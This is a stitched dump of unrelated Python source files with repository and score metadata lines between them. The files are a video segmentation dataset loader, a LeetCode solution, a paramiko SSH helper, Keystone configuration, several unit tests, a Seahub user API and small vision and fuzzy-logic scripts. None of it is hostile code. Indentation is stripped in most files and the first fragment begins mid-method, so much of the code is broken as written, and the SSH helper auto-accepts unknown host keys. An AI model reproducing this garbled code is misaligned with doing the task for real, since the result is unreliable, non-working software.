video_name = self.dataset_list[idx]
img_dir = os.path.join(self.root, 'JPEGImages', '480p', video_name)
mask_dir = os.path.join(self.root, 'Annotations', '480p', video_name)
img_list = sorted(glob(os.path.join(img_dir, '*.jpg')))
mask_list = sorted(glob(os.path.join(mask_dir, '*.png')))
first_mask = load_image_in_PIL(mask_list[0], 'P')
original_w, original_h = first_mask.size
if self.output_size:
out_h, out_w = self.output_size
if original_h < out_h:
h, w = original_h, original_w
else:
h = out_h
w = int(original_w / original_h * out_h)
# h = self.out_h
# w = self.out_w
else:
h, w = original_h, original_w
first_mask = first_mask.resize((w, h), Image.NEAREST)
first_mask_np = np.array(first_mask, np.uint8)
if self.single_obj:
first_mask_np[first_mask_np > 1] = 1
obj_n = first_mask_np.max() + 1
video_len = len(img_list)
frames = torch.zeros((video_len, 3, h, w), dtype=torch.float)
masks = torch.zeros((1, obj_n, h, w), dtype=torch.float)
mask, _ = self.to_onehot(first_mask_np)
masks[0] = mask[:obj_n]
for i in range(video_len):
img = load_image_in_PIL(img_list[i], 'RGB')
img = img.resize((w, h), Image.BILINEAR)
frames[i] = self.normalize(self.to_tensor(img))
info = {
'name': video_name,
'num_frames': video_len,
'original_size': (original_h, original_w)
}
return frames, masks, obj_n, info
def build_davis(cfg, train=True):
if train:
return DAVIS_Train(
root=cfg.DATA.DAVIS_ROOT,
output_size=cfg.DATA.SIZE,
clip_n=cfg.DATA.TRAIN.FRAMES_PER_CLIP,
max_obj_n=cfg.DATA.TRAIN.MAX_OBJECTS,
max_skip=cfg.DATA.TRAIN.DAVIS_SKIP_INCREMENT[0],
increment=cfg.DATA.TRAIN.DAVIS_SKIP_INCREMENT[1],
samples=cfg.DATA.TRAIN.SAMPLES_PER_VIDEO,
choice=cfg.DATA.TRAIN.SAMPLE_CHOICE,
crop=cfg.DATA.TRAIN.CROP
)
else:
single_obj = (cfg.DATA.VAL.DATASET_NAME == 'DAVIS16')
return DAVIS_Test(
root=cfg.DATA.DAVIS_ROOT,
single_obj=single_obj
)
if __name__ == '__main__':
ds = DAVIS_Train('/public/datasets/DAVIS', output_size=(240, 427), max_obj_n=6)
trainloader = data.DataLoader(ds, batch_size=1, shuffle=True, num_workers=1,
collate_fn=multibatch_collate_fn, drop_last=True)
    i, batch = next(enumerate(trainloader))  # renamed: `data` shadowed the torch.utils.data import
    print(batch[0].shape, batch[1].shape, batch[2], batch[3][0])
    frame, mask, num_obj = batch[0][0], batch[1][0], batch[2][0]
frame, mask = frame[:3], mask[:3]
print(torch.max(mask), torch.min(mask))
fig = plt.figure()
for j in range(frame.shape[0]):
ax = fig.add_subplot(2, 3, i*6+j+1)
ax.axis('off')
ax.imshow(frame[j].numpy().transpose(1, 2, 0))
plt.pause(0.01)
for k in range(mask.shape[0]):
ax = fig.add_subplot(2, 3, i*6+4+k)
ax.axis('off')
# ax.imshow(np.array(mask[k, 0], dtype=np.uint8))
ax.imshow(convert_one_hot(np.array(mask[k],dtype=np.uint8).transpose(1, 2, 0), num_obj.item()))
plt.pause(0.01)
# plt.imsave('test{}.png'.format(k), convert_one_hot(np.array(mask[k],dtype=np.uint8).transpose(1, 2, 0), num_obj.item()))
fig.savefig("test.png") | 2.21875 | 2 |
code/ch17/17.1.1.majorityElement.py | leetcode-pp/leetcode-pp1 | 22 | 12797967 | <gh_stars>10-100
class Solution:
def majorityElement(self, nums: List[int]) -> List[int]:
n = len(nums)
res = []
cnt1 = 0
cnt2 = 0
n1 = None
n2 = None
# 筛选出现次数最多的前两个
for num in nums:
if num == n1:
cnt1 += 1
elif num == n2:
cnt2 += 1
elif cnt1 == 0:
n1 = num
cnt1 += 1
elif cnt2 == 0:
n2 = num
cnt2 += 1
else:
cnt1 -= 1
cnt2 -= 1
# 筛选出现次数超过三分之一的
# 这里的cnt1和cnt2的含义已经变了
# 这里的cnt1和cnt2表示的是出现次数, 而上面的则不是
cnt1 = 0
cnt2 = 0
for num in nums:
if num == n1:
cnt1 += 1
if num == n2:
cnt2 += 1
if cnt1 > n // 3:
res.append(n1)
if cnt2 > n // 3:
res.append(n2)
return res
| 2.984375 | 3 |
common/code/snippets/txt/ssh.py | nevesnunes/env | 4 | 12797968 | <filename>common/code/snippets/txt/ssh.py
import paramiko
import datetime
import subprocess # run it locally if you want, use this for Bash commands
def run_netflow_cmd(command):
rwflow_server_ip = "192.168.3.11" # SiLK box
user_name="netflow"
keyfile="/home/marius/.ssh/id_rsa"
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(rwflow_server_ip, username=user_name, key_filename=keyfile)
stdin, stdout, stderr = ssh.exec_command(command + "&& echo 'done'")
    for line in stderr.readlines():
        print(line)
    for line in stdout.readlines():
        # Uncomment to echo the command's stdout:
        # print(line)
        pass
    exit_status = stdout.channel.recv_exit_status()  # Blocking call
    if exit_status == 0:
        print(str(datetime.datetime.today()) + ": Command finished successfully.")
else:
print("Error", exit_status)
ssh.close()
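# Hedged usage sketch -- the host, user and key path above describe one local
# setup, and the SiLK pipeline below is illustrative only:
#     run_netflow_cmd("rwfilter --type=all --start-date=2020/01/01 --proto=6 --pass=stdout"
#                     " | rwstats --top --count=10 --fields=sip")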
| 2.59375 | 3 |
models/inclusive_gateway.py | THM-MA/XSDATA-waypoint | 0 | 12797969 | from dataclasses import dataclass
from .t_inclusive_gateway import TInclusiveGateway
__NAMESPACE__ = "http://www.omg.org/spec/BPMN/20100524/MODEL"
@dataclass
class InclusiveGateway(TInclusiveGateway):
class Meta:
name = "inclusiveGateway"
namespace = "http://www.omg.org/spec/BPMN/20100524/MODEL"
| 1.921875 | 2 |
tests/testArUco.py | snavas/PyMote | 3 | 12797970 | <reponame>snavas/PyMote
import numpy as np
import cv2
from cv2 import aruco
# https://mecaruco2.readthedocs.io/en/latest/notebooks_rst/Aruco/Aruco.html
aruco_dict = aruco.Dictionary_get(aruco.DICT_6X6_250)
image = cv2.imread("../tests/aruco.jpg")
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
parameters = aruco.DetectorParameters_create()
corners, ids, rejectedImgPoints = aruco.detectMarkers(gray, aruco_dict, parameters=parameters)
frame_markers = aruco.drawDetectedMarkers(image.copy(), corners, ids)
for i in range(len(ids)):
c = corners[i][0]
    # plt.plot([c[:, 0].mean()], [c[:, 1].mean()], "o", label="id={0}".format(ids[i]))
print(c)
images_H1 = np.hstack((image, frame_markers))
images_H2 = np.hstack((image, frame_markers))
images = np.vstack((images_H1, images_H2))
cv2.imshow('ARUCO', images_H1)
cv2.waitKey(0)
cv2.destroyAllWindows()
| 2.546875 | 3 |
ls-tree/python/main.py | danielo515/explore-new-languages | 0 | 12797971 | import os
from os import listdir
from argparse import ArgumentParser
from os.path import isdir,join
middle = '├'
pipe = '│'
last = '└'
scale = 2
def traverse(path, parents='', depth=0, isLast=True):
tree = [(path, parents, depth, isLast)]
realPath = join(parents,path)
files = listdir(realPath)
maxFiles = len(files)
for idx,file in enumerate(files):
curPath = join(realPath,file)
isLast = idx == maxFiles -1
if isdir(curPath):
tree = tree + (traverse(file,realPath, depth+1, isLast))
else:
tree.append((file, parents, depth+1, isLast))
return tree
def addDepth(depth,connections,spacer=" "):
return "".join([pipe if x in connections else spacer for x in range(0, depth)])
def findConnections(depth, below):
depths = []
for (_,_,curDepth,_) in below:
if curDepth < depth:
depths.append(curDepth)
depth=curDepth
return depths
def prettyPrint(treeInfo):
for idx,node in enumerate(treeInfo):
(name, parents, depth, isLast) = node
prefix = last if isLast else middle
connections = [x*scale for x in findConnections(depth,treeInfo[idx:])]
print("%s%s %s"%(addDepth(depth*scale,connections), prefix, name))
parser = ArgumentParser(description="list a folder as a tree")
parser.add_argument("folder",default="./", type=str)
args = parser.parse_args()
folderInfo = traverse(args.folder)
print(prettyPrint(folderInfo))
| 3.203125 | 3 |
keystone/config.py | savi-dev/keystone | 0 | 12797972 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import gettext
import os
import sys
from keystone.common import logging
from keystone.openstack.common import cfg
gettext.install('keystone', unicode=1)
CONF = cfg.CONF
def setup_logging(conf):
"""
Sets up the logging options for a log with supplied name
:param conf: a cfg.ConfOpts object
"""
if conf.log_config:
# Use a logging configuration file for all settings...
if os.path.exists(conf.log_config):
logging.config.fileConfig(conf.log_config)
return
else:
raise RuntimeError('Unable to locate specified logging '
'config file: %s' % conf.log_config)
root_logger = logging.root
if conf.debug:
root_logger.setLevel(logging.DEBUG)
elif conf.verbose:
root_logger.setLevel(logging.INFO)
else:
root_logger.setLevel(logging.WARNING)
formatter = logging.Formatter(conf.log_format, conf.log_date_format)
if conf.use_syslog:
try:
facility = getattr(logging.SysLogHandler,
conf.syslog_log_facility)
except AttributeError:
raise ValueError(_('Invalid syslog facility'))
handler = logging.SysLogHandler(address='/dev/log',
facility=facility)
elif conf.log_file:
logfile = conf.log_file
if conf.log_dir:
logfile = os.path.join(conf.log_dir, logfile)
handler = logging.WatchedFileHandler(logfile)
else:
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(formatter)
root_logger.addHandler(handler)
def register_str(*args, **kw):
conf = kw.pop('conf', CONF)
group = kw.pop('group', None)
return conf.register_opt(cfg.StrOpt(*args, **kw), group=group)
def register_cli_str(*args, **kw):
conf = kw.pop('conf', CONF)
group = kw.pop('group', None)
return conf.register_cli_opt(cfg.StrOpt(*args, **kw), group=group)
def register_bool(*args, **kw):
conf = kw.pop('conf', CONF)
group = kw.pop('group', None)
return conf.register_opt(cfg.BoolOpt(*args, **kw), group=group)
def register_cli_bool(*args, **kw):
conf = kw.pop('conf', CONF)
group = kw.pop('group', None)
return conf.register_cli_opt(cfg.BoolOpt(*args, **kw), group=group)
def register_int(*args, **kw):
conf = kw.pop('conf', CONF)
group = kw.pop('group', None)
return conf.register_opt(cfg.IntOpt(*args, **kw), group=group)
def register_cli_int(*args, **kw):
conf = kw.pop('conf', CONF)
group = kw.pop('group', None)
return conf.register_cli_opt(cfg.IntOpt(*args, **kw), group=group)
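# Hedged usage note: each helper above is a thin wrapper over oslo-style option
# registration; for example,
#     register_str('admin_token', default='ADMIN')
# is equivalent to CONF.register_opt(cfg.StrOpt('admin_token', default='ADMIN')).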
register_str('admin_token', default='ADMIN')
register_str('bind_host', default='0.0.0.0')
register_str('compute_port', default=8774)
register_str('admin_port', default=35357)
register_str('public_port', default=5000)
register_str('onready')
register_str('auth_admin_prefix', default='')
#ssl options
register_bool('enable', group='ssl', default=False)
register_str('certfile', group='ssl', default=None)
register_str('keyfile', group='ssl', default=None)
register_str('ca_certs', group='ssl', default=None)
register_bool('cert_required', group='ssl', default=False)
#signing options
register_str('token_format', group='signing',
default="UUID")
register_str('certfile', group='signing',
default="/etc/keystone/ssl/certs/signing_cert.pem")
register_str('keyfile', group='signing',
default="/etc/keystone/ssl/private/signing_key.pem")
register_str('ca_certs', group='signing',
default="/etc/keystone/ssl/certs/ca.pem")
register_int('key_size', group='signing', default=1024)
register_int('valid_days', group='signing', default=3650)
register_str('ca_password', group='signing', default=None)
# sql options
register_str('connection', group='sql', default='sqlite:///keystone.db')
register_int('idle_timeout', group='sql', default=200)
register_str('driver', group='catalog',
default='keystone.catalog.backends.sql.Catalog')
register_str('driver', group='identity',
default='keystone.identity.backends.sql.Identity')
register_str('driver', group='policy',
default='keystone.policy.backends.rules.Policy')
register_str('driver', group='token',
default='keystone.token.backends.kvs.Token')
register_str('driver', group='ec2',
default='keystone.contrib.ec2.backends.kvs.Ec2')
register_str('driver', group='stats',
default='keystone.contrib.stats.backends.kvs.Stats')
#ldap
register_str('url', group='ldap', default='ldap://localhost')
register_str('user', group='ldap', default='dc=Manager,dc=example,dc=com')
register_str('password', group='ldap', default='<PASSWORD>')
register_str('suffix', group='ldap', default='cn=example,cn=com')
register_bool('use_dumb_member', group='ldap', default=False)
register_str('user_name_attribute', group='ldap', default='sn')
register_str('user_tree_dn', group='ldap', default=None)
register_str('user_objectclass', group='ldap', default='inetOrgPerson')
register_str('user_id_attribute', group='ldap', default='cn')
register_str('tenant_tree_dn', group='ldap', default=None)
register_str('tenant_objectclass', group='ldap', default='groupOfNames')
register_str('tenant_id_attribute', group='ldap', default='cn')
register_str('tenant_member_attribute', group='ldap', default='member')
register_str('tenant_name_attribute', group='ldap', default='ou')
register_str('role_tree_dn', group='ldap', default=None)
register_str('role_objectclass', group='ldap', default='organizationalRole')
register_str('role_id_attribute', group='ldap', default='cn')
register_str('role_member_attribute', group='ldap', default='roleOccupant')
#pam
register_str('url', group='pam', default=None)
register_str('userid', group='pam', default=None)
register_str('password', group='pam', default=None)
| 1.976563 | 2 |
backend/tests/session/test_session_login_user.py | fjacob21/mididecweb | 0 | 12797973 | from datetime import datetime, timedelta
import pytz
from bcrypt_hash import BcryptHash
import pytest
from src.users import Users
from src.events import Events
from src.stores import MemoryStore
from src.session import Session
def test_login_user():
store = MemoryStore()
users = Users(store)
params = {}
params['password'] = 'password'
session = Session(params, store, '')
password = BcryptHash('password').encrypt()
user = users.add('email', 'name', 'alias', password, 'phone', True, True,
user_id='test')
user.validated = True
with pytest.raises(Exception):
session.login('')
    login_dict = session.login('test')
    assert login_dict
    assert 'user' in login_dict
def test_login_user_bad_password():
store = MemoryStore()
users = Users(store)
params = {}
params['password'] = '<PASSWORD>'
session = Session(params, store, '')
password = BcryptHash('password').encrypt()
user = users.add('email', 'name', 'alias', password, 'phone', True, True,
user_id='test')
user.validated = True
with pytest.raises(Exception):
session.login('test')
def test_login_user_register():
store = MemoryStore()
users = Users(store)
events = Events(store)
start = datetime.now(pytz.timezone("America/New_York"))
dur = timedelta(hours=1)
params = {}
params['password'] = 'password'
password = BcryptHash('password').encrypt()
user = users.add('email', 'name', 'alias', password, 'phone', True, True,
user_id='test')
events.add('test', 'test', 30, start, dur, 'test', 'test',
'<EMAIL>', 'test', user)
user.validated = True
params['register'] = 'test'
session = Session(params, store, '')
    login_dict = session.login('test')
    assert login_dict
    assert 'user' in login_dict
    assert 'register' in login_dict
    assert login_dict['register'] == 'test'
def test_login_user_register_bad_event():
store = MemoryStore()
users = Users(store)
events = Events(store)
start = datetime.now(pytz.timezone("America/New_York"))
dur = timedelta(hours=1)
params = {}
params['password'] = 'password'
password = BcryptHash('password').encrypt()
user = users.add('email', 'name', 'alias', password, 'phone', True, True,
user_id='test')
events.add('test', 'test', 30, start, dur, 'test', 'test',
'<EMAIL>', 'test', user)
user.validated = True
params['register'] = ''
session = Session(params, store, '')
with pytest.raises(Exception):
session.login('test')
| 2.265625 | 2 |
tests/unit/test_sessions.py | irvansemestanya/vault-cli | 52 | 12797974 | <reponame>irvansemestanya/vault-cli<filename>tests/unit/test_sessions.py<gh_stars>10-100
import os
import pytest
from vault_cli import sessions
@pytest.fixture
def reset_requests_ca_bundle():
requests_ca_bundle = os.environ.get("REQUESTS_CA_BUNDLE")
os.environ.pop("REQUESTS_CA_BUNDLE", None)
yield
if requests_ca_bundle is not None:
os.environ["REQUESTS_CA_BUNDLE"] = requests_ca_bundle
else:
os.environ.pop("REQUESTS_CA_BUNDLE", None)
@pytest.mark.parametrize(
"verify, envvar, expected, expected_with_requests",
[
(None, None, True, True),
(True, None, True, True),
(False, None, False, False),
("blu", None, "blu", "blu"),
(None, "bla", "bla", "bla"),
(True, "bla", "bla", "bla"),
(False, "bla", False, "bla"), # This is the case we're supposedly fixing
(
"blu",
"bla",
"bla",
"bla",
), # This might be surprising but it's not important.
],
)
def test_session(
reset_requests_ca_bundle,
requests_mock,
verify,
envvar,
expected,
expected_with_requests,
):
requests_mock.get("https://bla")
import requests
vault_cli_session = sessions.Session()
requests_session = requests.Session()
if envvar is not None:
os.environ["REQUESTS_CA_BUNDLE"] = envvar
if verify is not None:
vault_cli_session.verify = verify
requests_session.verify = verify
vault_cli_session.get("https://bla")
# If this tests fails here, it means the Session workaround doesn't
# work anymore
assert requests_mock.last_request.verify == expected
requests_session.get("https://bla")
# If this tests fails here, it means requests have solved the bug
# and we don't need a workaround anymore
assert requests_mock.last_request.verify == expected_with_requests
| 2.046875 | 2 |
tensorflow/contrib/distributions/python/kernel_tests/estimator_test.py | tianyapiaozi/tensorflow | 848 | 12797975 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for estimator.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import six
from tensorflow.contrib.distributions.python.ops import estimator as estimator_lib
from tensorflow.contrib.learn.python.learn.estimators import constants
from tensorflow.contrib.learn.python.learn.estimators import head as head_lib
from tensorflow.contrib.learn.python.learn.estimators import model_fn
from tensorflow.contrib.learn.python.learn.estimators.head_test import _assert_metrics
from tensorflow.contrib.learn.python.learn.estimators.head_test import _assert_no_variables
from tensorflow.contrib.learn.python.learn.estimators.head_test import _assert_summary_tags
from tensorflow.python.client import session
from tensorflow.python.framework import ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops.distributions import normal as normal_lib
from tensorflow.python.platform import test
class EstimatorHeadDistributionRegressionTest(test.TestCase):
def _assert_output_alternatives(self, model_fn_ops):
self.assertEquals({
None: constants.ProblemType.LINEAR_REGRESSION
}, {
k: v[0] for k, v in six.iteritems(model_fn_ops.output_alternatives)
})
def testNormalLocScaleLogits(self):
# We will bias logits[..., 1] so that: logits[..., 1]=0 implies scale=1.
scale_bias = np.log(np.expm1(1.))
def softplus(x):
return np.log1p(np.exp(x))
def actual_loss(logits, labels):
mu = actual_mean(logits)
sigma = actual_stddev(logits)
labels = np.squeeze(labels, -1)
z = (labels - mu) / sigma
loss = 0.5 * (z**2. + np.log(2. * np.pi)) + np.log(sigma)
return loss.mean()
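    # (Hedged note) `actual_loss` above is the closed-form negative log-likelihood
    # of Normal(mu, sigma) evaluated at `labels`:
    #     -log p(y) = 0.5 * (z**2 + log(2 * pi)) + log(sigma),   z = (y - mu) / sigma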
def actual_mean(logits):
return logits[..., 0]
def actual_stddev(logits):
return softplus(logits[..., 1] + scale_bias)
def make_distribution_fn(logits):
return normal_lib.Normal(
loc=logits[..., 0],
scale=nn_ops.softplus(logits[..., 1] + scale_bias))
head = estimator_lib.estimator_head_distribution_regression(
make_distribution_fn,
logits_dimension=2)
labels = np.float32([[-1.],
[0.],
[1.]])
logits = np.float32([[0., -1],
[1, 0.5],
[-1, 1]])
with ops.Graph().as_default(), session.Session():
# Convert to tensor so we can index into head.distributions.
tflogits = ops.convert_to_tensor(logits, name="logits")
model_fn_ops = head.create_model_fn_ops(
{},
labels=labels,
mode=model_fn.ModeKeys.TRAIN,
train_op_fn=head_lib.no_op_train_fn,
logits=tflogits)
self._assert_output_alternatives(model_fn_ops)
_assert_summary_tags(self, ["loss"])
_assert_no_variables(self)
loss = actual_loss(logits, labels)
_assert_metrics(self, loss, {"loss": loss}, model_fn_ops)
# Now we verify the underlying distribution was correctly constructed.
expected_mean = logits[..., 0]
self.assertAllClose(
expected_mean,
head.distribution(tflogits).mean().eval(),
rtol=1e-6, atol=0.)
expected_stddev = softplus(logits[..., 1] + scale_bias)
self.assertAllClose(
expected_stddev,
head.distribution(tflogits).stddev().eval(),
rtol=1e-6, atol=0.)
# Should have created only one distribution.
self.assertEqual(1, len(head.distributions))
if __name__ == "__main__":
test.main()
| 1.789063 | 2 |
seahub/organizations/api/users.py | samuelduann/seahub | 420 | 12797976 | # Copyright (c) 2012-2016 Seafile Ltd.
import logging
from rest_framework import status
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.authentication import SessionAuthentication
from seaserv import ccnet_api
from seahub.api2.permissions import IsProVersion
from seahub.api2.throttling import UserRateThrottle
from seahub.api2.authentication import TokenAuthentication
from seahub.api2.utils import api_error
from seahub.api2.endpoints.utils import is_org_user
from seahub.utils import is_valid_email
from seahub.base.accounts import User
from seahub.base.templatetags.seahub_tags import email2nickname
from seahub.profile.models import Profile
logger = logging.getLogger(__name__)
def get_user_info(email):
profile = Profile.objects.get_profile_by_user(email)
info = {}
info['email'] = email
info['name'] = email2nickname(email)
info['contact_email'] = profile.contact_email if profile and profile.contact_email else ''
return info
class OrgAdminUser(APIView):
authentication_classes = (TokenAuthentication, SessionAuthentication)
throttle_classes = (UserRateThrottle,)
permission_classes = (IsProVersion,)
def put(self, request, org_id, email):
""" update name of an org user.
Permission checking:
1. only admin can perform this action.
"""
# resource check
org_id = int(org_id)
if not ccnet_api.get_org_by_id(org_id):
error_msg = 'Organization %s not found.' % org_id
return api_error(status.HTTP_404_NOT_FOUND, error_msg)
try:
user = User.objects.get(email=email)
except User.DoesNotExist:
error_msg = 'User %s not found.' % email
return api_error(status.HTTP_404_NOT_FOUND, error_msg)
# permission check
if not request.user.org.is_staff:
error_msg = 'Permission denied.'
return api_error(status.HTTP_403_FORBIDDEN, error_msg)
if request.user.org.org_id != org_id:
error_msg = 'Permission denied.'
return api_error(status.HTTP_403_FORBIDDEN, error_msg)
if not is_org_user(email, org_id):
error_msg = 'Permission denied.'
return api_error(status.HTTP_403_FORBIDDEN, error_msg)
# update user's name
name = request.data.get("name", None)
if name is not None:
name = name.strip()
if len(name) > 64:
error_msg = 'Name is too long (maximum is 64 characters).'
return api_error(status.HTTP_400_BAD_REQUEST, error_msg)
if "/" in name:
error_msg = "Name should not include '/'."
return api_error(status.HTTP_400_BAD_REQUEST, error_msg)
try:
Profile.objects.add_or_update(email, nickname=name)
except Exception as e:
logger.error(e)
error_msg = 'Internal Server Error'
return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)
# update user's contact email
contact_email = request.data.get("contact_email", None)
if contact_email is not None:
contact_email = contact_email.strip()
if contact_email != '' and not is_valid_email(contact_email):
error_msg = 'contact_email invalid.'
return api_error(status.HTTP_400_BAD_REQUEST, error_msg)
try:
Profile.objects.add_or_update(email, contact_email=contact_email)
except Exception as e:
logger.error(e)
error_msg = 'Internal Server Error'
return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)
info = get_user_info(email)
info['is_active'] = user.is_active
return Response(info)
| 1.9375 | 2 |
perfect.py | CrownCrafter/School | 0 | 12797977 | <filename>perfect.py
#!/usr/bin/env python3
x = int(input("Enter number "))
p = x
i = 1
total = 0
# Count the digits of x (dig is computed below but never used afterwards)
while True:
if(x // (10 ** i) == 0):
dig = i
break
i += 1
i = 1
factors=[]
while(i < x):
if(x % i == 0):
factors.append(i)
i += 1
for i in range(0, len(factors)):
    total += factors[i]
if total == x:
    print("It is a perfect number")
else:
print("It is not a perfect number")
| 3.875 | 4 |
app/recommendation/migrations/0003_auto_20181115_2259.py | A2ed/affective-recommendation | 0 | 12797978 | <gh_stars>0
# Generated by Django 2.1.3 on 2018-11-15 22:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('recommendation', '0002_auto_20181115_2204'),
]
operations = [
migrations.RemoveField(
model_name='state',
name='user_id',
),
migrations.AlterField(
model_name='state',
name='name',
field=models.CharField(blank=True, max_length=50),
),
]
| 1.40625 | 1 |
helpers/move_detection.py | playingwithai/rock_paper_scissors_part3 | 0 | 12797979 | import logging
import os
from enum import Enum
from imageai.Prediction.Custom import CustomImagePrediction
# Show only errors in console
logging.getLogger("tensorflow").setLevel(logging.ERROR)
class MovesEnum(int, Enum):
ROCK = 0
PAPER = 1
SCISSORS = 2
class ModelTypeEnum(Enum):
"""
    A helper enum for choosing the model type
"""
RESNET = 0
SQEEZENET = 1
INCEPTIONV3 = 2
DENSENET = 3
class RockPaperScissorsPredictor:
"""
This class contains the required code for model training and move prediction using a
webcam
"""
MODEL_TYPE_SET_LOOKUP = {
ModelTypeEnum.RESNET: lambda x: x.setModelTypeAsResNet(),
ModelTypeEnum.SQEEZENET: lambda x: x.setModelTypeAsSqueezeNet(),
ModelTypeEnum.INCEPTIONV3: lambda x: x.setModelTypeAsInceptionV3(),
ModelTypeEnum.DENSENET: lambda x: x.setModelTypeAsDenseNet(),
}
MOVES_LOOKUP = {
"rock": MovesEnum.ROCK,
"paper": MovesEnum.PAPER,
"scissors": MovesEnum.SCISSORS,
}
def __init__(
self,
model_type=ModelTypeEnum.RESNET,
class_number=3, # We have 3 different objects: "rock", "paper", "scissors"
):
self.model_type = model_type
self.class_number = class_number
self.base_path = os.getcwd()
# Instantiate the CustomImagePrediction object that will predict our moves
self.predictor = CustomImagePrediction()
        # Set the model type of the neural network (it must match the one used for training)
self._set_proper_model_type(self.model_type)
# Set path to the trained model file
self.predictor.setModelPath(
os.path.join(self.base_path, "data", "move_detector", "model.h5")
)
# Set path to the json file that contains our classes and their labels
self.predictor.setJsonPath(
os.path.join(self.base_path, "data", "move_detector", "model_class.json")
)
# Load the trained model and set it to use "class_number" classes
self.predictor.loadModel(num_objects=self.class_number)
def _set_proper_model_type(self, model_type):
self.MODEL_TYPE_SET_LOOKUP[model_type](self.predictor)
def detect_move_from_picture(self, picture, sensibility=90):
predictions, probabilities = self.predictor.predictImage(
picture, result_count=3, input_type="array"
)
# Get a tuple (class_predicted, probability) that contains the best
# prediction
best_prediction = max(
zip(predictions, probabilities), key=lambda x: x[1]
)
if best_prediction[1] < sensibility:
return
return self.MOVES_LOOKUP[best_prediction[0]]
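# Hedged usage sketch (OpenCV webcam capture is an assumption of this example,
# not something this module provides):
#     import cv2
#     detector = RockPaperScissorsPredictor()
#     ok, frame = cv2.VideoCapture(0).read()
#     if ok:
#         move = detector.detect_move_from_picture(frame)
#         print(move)  # MovesEnum member, or None below the sensibility threshold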
| 2.890625 | 3 |
fuzzy_modeling/tests/models/test_system_model.py | arruda/cloudfuzzy | 2 | 12797980 | <gh_stars>1-10
# -*- coding: utf-8 -*-
import inspect
import mock
from django.test import TestCase
from fuzzy_modeling.tests.utils import ResetMock
from fuzzy_modeling.models.systems import SystemModel
from fuzzy.System import System
class SystemModelTest(TestCase, ResetMock):
def setUp(self):
# self.aluno = mommy.make_one(Aluno)
# from fuzzy_modeling.models.systems import SystemModel as SystemModelOriginal
# import pdb; pdb.set_trace()
# reset_mock(SystemModel,'inputvariablemodel_set')
# reset_mock(SystemModel,'outputvariablemodel_set')
# reset_mock(SystemModel,'rulemodel_set')
pass
def tearDown(self):
"""And kill it when done"""
self.reset_all_pre_mocks(SystemModel)
def _named_and_pyfuzzymixin_mock(self, name):
"""
mock a variable or to be an object that has attr name and a get_pyfuzzy that returns this name
"""
var = mock.Mock()
var.name = name
        var.get_pyfuzzy = lambda system=None: name
return var
def _mock_systemModel(self):
self.system_description = "System description"
self.system = SystemModel(description=self.system_description)
self.input_variable_mock = [
self._named_and_pyfuzzymixin_mock("iv%d" % i)
for i in xrange(1,2)
]
self.output_variable_mock = [
self._named_and_pyfuzzymixin_mock("ov%d" % i)
for i in xrange(1,2)
]
self.rules_mock = [
self._named_and_pyfuzzymixin_mock("r%d" % i)
for i in xrange(1,2)
]
# mocking inputvariablemodel_set
# inputvariablemodel_set = lambda : None
inputvariablemodel_set = mock.Mock()
inputvariablemodel_set.all = lambda : self.input_variable_mock
self.set_pre_mock(SystemModel,'inputvariablemodel_set')
SystemModel.inputvariablemodel_set = inputvariablemodel_set
# mocking outputvariablemodel_set
outputvariablemodel_set = mock.Mock()
outputvariablemodel_set.all = lambda : self.output_variable_mock
self.set_pre_mock(SystemModel,'outputvariablemodel_set')
SystemModel.outputvariablemodel_set = outputvariablemodel_set
# mocking rulemodel_set
rulemodel_set = mock.Mock()
rulemodel_set.all = lambda : self.rules_mock
self.set_pre_mock(SystemModel,'rulemodel_set')
SystemModel.rulemodel_set = rulemodel_set
return self.system
def test_system_get_pyfuzzy(self):
" shoud return the correct corresponding pyfuzzy object "
new_system = self._mock_systemModel()
new_pyfuzzy_system = new_system.get_pyfuzzy()
# the expected pyfuzzy system
pyfuzzy_system_expected = System(self.system_description)
variable_dict = { var.name : var.get_pyfuzzy() for var in self.input_variable_mock + self.output_variable_mock }
pyfuzzy_system_expected.variables = variable_dict
rules_dict = { rule.name : rule.get_pyfuzzy() for rule in self.rules_mock }
pyfuzzy_system_expected.rules = rules_dict
self.assertEquals(pyfuzzy_system_expected.description, new_pyfuzzy_system.description)
self.assertDictEqual(pyfuzzy_system_expected.variables, new_pyfuzzy_system.variables)
self.assertDictEqual(pyfuzzy_system_expected.rules, new_pyfuzzy_system.rules)
@classmethod
def _createSystem(cls):
import fuzzy.System
system = fuzzy.System.System(description=
"""This fuzzy system is to control the inverted pendulum into an upright position as well as
at the position X=0.
It also is used to demonstrate some features of pyfuzzy.
This is the reason, it uses different fuzzy norm in normally
symmetrical rules.""")
from fuzzy.norm.AlgebraicProduct import AlgebraicProduct
from fuzzy.norm.AlgebraicSum import AlgebraicSum
from fuzzy.fuzzify.Plain import Plain
from fuzzy.defuzzify.COG import COG
# set defuzzification method and default norms
INF = AlgebraicProduct()
ACC = AlgebraicSum()
COM = AlgebraicSum()
CER = AlgebraicProduct()
COG = COG(INF=INF,ACC=ACC,failsafe = 0., segment_size=0.5)
from fuzzy.InputVariable import InputVariable
from fuzzy.OutputVariable import OutputVariable
